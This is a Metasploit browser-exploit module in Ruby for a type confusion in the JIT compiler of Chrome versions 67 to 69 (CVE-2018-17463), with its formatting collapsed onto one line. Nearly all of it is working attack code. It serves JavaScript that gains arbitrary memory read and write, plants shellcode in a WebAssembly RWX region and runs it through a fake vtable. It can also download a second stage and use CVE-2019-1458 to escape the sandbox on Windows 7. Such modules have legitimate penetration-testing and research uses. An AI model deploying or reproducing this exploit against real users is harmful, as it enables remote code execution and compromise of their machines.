## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Post::File include Msf::Exploit::Remote::HttpServer::BrowserExploit include Msf::Payload::Windows::AddrLoader_x64 include Msf::Payload::Windows::ReflectiveDllInject_x64 def initialize(info = {}) super( update_info( info, 'Name' => 'Google Chrome 67, 68 and 69 Object.create exploit', 'Description' => %q{ This modules exploits a type confusion in Google Chromes JIT compiler. The Object.create operation can be used to cause a type confusion between a PropertyArray and a NameDictionary. The payload is executed within the rwx region of the sandboxed renderer process. This module can target the renderer process (target 0), but Google Chrome must be launched with the --no-sandbox flag for the payload to execute successfully. Alternatively, this module can use CVE-2019-1458 to escape the renderer sandbox (target 1). This will only work on vulnerable versions of Windows (e.g Windows 7) and the exploit can only be triggered once. Additionally the exploit can cause the target machine to restart when the session is terminated. A BSOD is also likely to occur when the system is shut down or rebooted. }, 'License' => MSF_LICENSE, 'Author' => [ 'saelo', # discovery and exploit 'timwr', # metasploit module ], 'References' => [ ['CVE', '2018-17463'], ['URL', 'http://www.phrack.org/papers/jit_exploitation.html'], ['URL', 'https://ssd-disclosure.com/archives/3783/ssd-advisory-chrome-type-confusion-in-jscreateobject-operation-to-rce'], ['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'], ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=888923'], ], 'Arch' => [ ARCH_X64 ], 'Platform' => ['windows', 'osx', 'linux'], 'DefaultTarget' => 0, 'Notes' => { 'Reliability' => [ REPEATABLE_SESSION ], 'SideEffects' => [ IOC_IN_LOGS ], 'Stability' => [CRASH_SAFE] }, 'Targets' => [ [ 'No sandbox escape (--no-sandbox)', {} ], [ 'Windows 7 (x64) sandbox escape via CVE-2019-1458', { 'Platform' => 'win', 'Arch' => [ARCH_X64], 'DefaultOptions' => { 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate' } } ], ], 'DisclosureDate' => '2018-09-25' ) ) deregister_options('DLL') end def library_path File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-1458', 'exploit.dll') end def on_request_uri(cli, request) print_status("Sending #{request.uri} to #{request['User-Agent']}") download_payload = '' shellcode = payload.encoded uripath = datastore['URIPATH'] || get_resource uripath += '/' unless uripath.end_with? '/' if target.name.end_with?('CVE-2019-1458') if request.uri.to_s.end_with?('/payload') loader_data = stage_payload pidx = loader_data.index('PAYLOAD:') if pidx loader_data[pidx, payload.encoded.length] = payload.encoded end loader_data += "\0" * (0x20000 - loader_data.length) send_response(cli, loader_data, { 'Content-Type' => 'application/octet-stream', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0' }) print_good("Sent stage2 exploit (#{loader_data.length.to_s(16)} bytes)") end loader = generate_loader shellcode = loader[0] shellcode_addr_offset = loader[1] shellcode_size_offset = loader[2] download_payload = <<-JS var req = new XMLHttpRequest(); req.open('GET', '#{uripath}payload', false); req.overrideMimeType('text/plain; charset=x-user-defined'); req.send(null); if (req.status != 200) { return; } let payload_size = req.responseText.length; let payload_array = new ArrayBuffer(payload_size); let payload8 = new Uint8Array(payload_array); for (let i = 0; i < req.responseText.length; i++) { payload8[i] = req.responseText.charCodeAt(i) & 0xff; } let payload_array_mem_addr = memory.addrof(payload_array) + 0x20n; let payload_array_addr = memory.readPtr(payload_array_mem_addr); print('payload addr: 0x' + payload_array_addr.toString(16)); uint64View[0] = payload_array_addr; for (let i = 0; i < 8; i++) { shellcode[#{shellcode_addr_offset} + i] = uint8View[i]; } for (let i = 0; i < 4; i++) { shellcode[#{shellcode_size_offset} + i] = (payload_size>>(8*i)) & 0xff; } for (let i = 4; i < 8; i++) { shellcode[#{shellcode_size_offset} + i] = 0; } JS end jscript = <<~JS let ab = new ArrayBuffer(8); let floatView = new Float64Array(ab); let uint64View = new BigUint64Array(ab); let uint8View = new Uint8Array(ab); let shellcode = new Uint8Array([#{Rex::Text.to_num(shellcode)}]); Number.prototype.toBigInt = function toBigInt() { floatView[0] = this; return uint64View[0]; }; BigInt.prototype.toNumber = function toNumber() { uint64View[0] = this; return floatView[0]; }; function hex(n) { return '0x' + n.toString(16); }; function fail(s) { print('FAIL ' + s); throw null; } const NUM_PROPERTIES = 32; const MAX_ITERATIONS = 100000; function gc() { for (let i = 0; i < 200; i++) { new ArrayBuffer(0x100000); } } function make(properties) { let o = {inline: 42} // TODO for (let i = 0; i < NUM_PROPERTIES; i++) { eval(`o.p${i} = properties[${i}];`); } return o; } function pwn() { function find_overlapping_properties() { let propertyNames = []; for (let i = 0; i < NUM_PROPERTIES; i++) { propertyNames[i] = `p${i}`; } eval(` function vuln(o) { let a = o.inline; this.Object.create(o); ${propertyNames.map((p) => `let ${p} = o.${p};`).join('\\n')} return [${propertyNames.join(', ')}]; } `); let propertyValues = []; for (let i = 1; i < NUM_PROPERTIES; i++) { propertyValues[i] = -i; } for (let i = 0; i < MAX_ITERATIONS; i++) { let r = vuln(make(propertyValues)); if (r[1] !== -1) { for (let i = 1; i < r.length; i++) { if (i !== -r[i] && r[i] < 0 && r[i] > -NUM_PROPERTIES) { return [i, -r[i]]; } } } } fail("Failed to find overlapping properties"); } function addrof(obj) { eval(` function vuln(o) { let a = o.inline; this.Object.create(o); return o.p${p1}.x1; } `); let propertyValues = []; propertyValues[p1] = {x1: 13.37, x2: 13.38}; propertyValues[p2] = {y1: obj}; let i = 0; for (; i < MAX_ITERATIONS; i++) { let res = vuln(make(propertyValues)); if (res !== 13.37) return res.toBigInt() } fail("Addrof failed"); } function corrupt_arraybuffer(victim, newValue) { eval(` function vuln(o) { let a = o.inline; this.Object.create(o); let orig = o.p${p1}.x2; o.p${p1}.x2 = ${newValue.toNumber()}; return orig; } `); let propertyValues = []; let o = {x1: 13.37, x2: 13.38}; propertyValues[p1] = o; propertyValues[p2] = victim; for (let i = 0; i < MAX_ITERATIONS; i++) { o.x2 = 13.38; let r = vuln(make(propertyValues)); if (r !== 13.38) return r.toBigInt(); } fail("Corrupt ArrayBuffer failed"); } let [p1, p2] = find_overlapping_properties(); print(`Properties p${p1} and p${p2} overlap after conversion to dictionary mode`); let memview_buf = new ArrayBuffer(1024); let driver_buf = new ArrayBuffer(1024); gc(); let memview_buf_addr = addrof(memview_buf); memview_buf_addr--; print(`ArrayBuffer @ ${hex(memview_buf_addr)}`); let original_driver_buf_ptr = corrupt_arraybuffer(driver_buf, memview_buf_addr); let driver = new BigUint64Array(driver_buf); let original_memview_buf_ptr = driver[4]; let memory = { write(addr, bytes) { driver[4] = addr; let memview = new Uint8Array(memview_buf); memview.set(bytes); }, read(addr, len) { driver[4] = addr; let memview = new Uint8Array(memview_buf); return memview.subarray(0, len); }, readPtr(addr) { driver[4] = addr; let memview = new BigUint64Array(memview_buf); return memview[0]; }, writePtr(addr, ptr) { driver[4] = addr; let memview = new BigUint64Array(memview_buf); memview[0] = ptr; }, addrof(obj) { memview_buf.leakMe = obj; let props = this.readPtr(memview_buf_addr + 8n); return this.readPtr(props + 15n) - 1n; }, }; // Generate a RWX region for the payload function get_wasm_instance() { var buffer = new Uint8Array([ 0,97,115,109,1,0,0,0,1,132,128,128,128,0,1,96,0,0,3,130,128,128,128,0, 1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128, 128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104, 101,108,108,111,0,0,10,136,128,128,128,0,1,130,128,128,128,0,0,11 ]); return new WebAssembly.Instance(new WebAssembly.Module(buffer),{}); } #{download_payload} let wasm_instance = get_wasm_instance(); let wasm_addr = memory.addrof(wasm_instance); print("wasm_addr @ " + hex(wasm_addr)); let wasm_rwx_addr = memory.readPtr(wasm_addr + 0xe0n); print("wasm_rwx @ " + hex(wasm_rwx_addr)); memory.write(wasm_rwx_addr, shellcode); let fake_vtab = new ArrayBuffer(0x80); let fake_vtab_u64 = new BigUint64Array(fake_vtab); let fake_vtab_addr = memory.readPtr(memory.addrof(fake_vtab) + 0x20n); let div = document.createElement('div'); let div_addr = memory.addrof(div); print('div_addr @ ' + hex(div_addr)); let el_addr = memory.readPtr(div_addr + 0x20n); print('el_addr @ ' + hex(el_addr)); fake_vtab_u64.fill(wasm_rwx_addr, 6, 10); memory.writePtr(el_addr, fake_vtab_addr); print('Triggering...'); // Trigger virtual call div.dispatchEvent(new Event('click')); // We are done here, repair the corrupted array buffers let addr = memory.addrof(driver_buf); memory.writePtr(addr + 32n, original_driver_buf_ptr); memory.writePtr(memview_buf_addr + 32n, original_memview_buf_ptr); } pwn(); JS jscript = add_debug_print_js(jscript) html = %( ) send_response(cli, html, { 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0' }) end end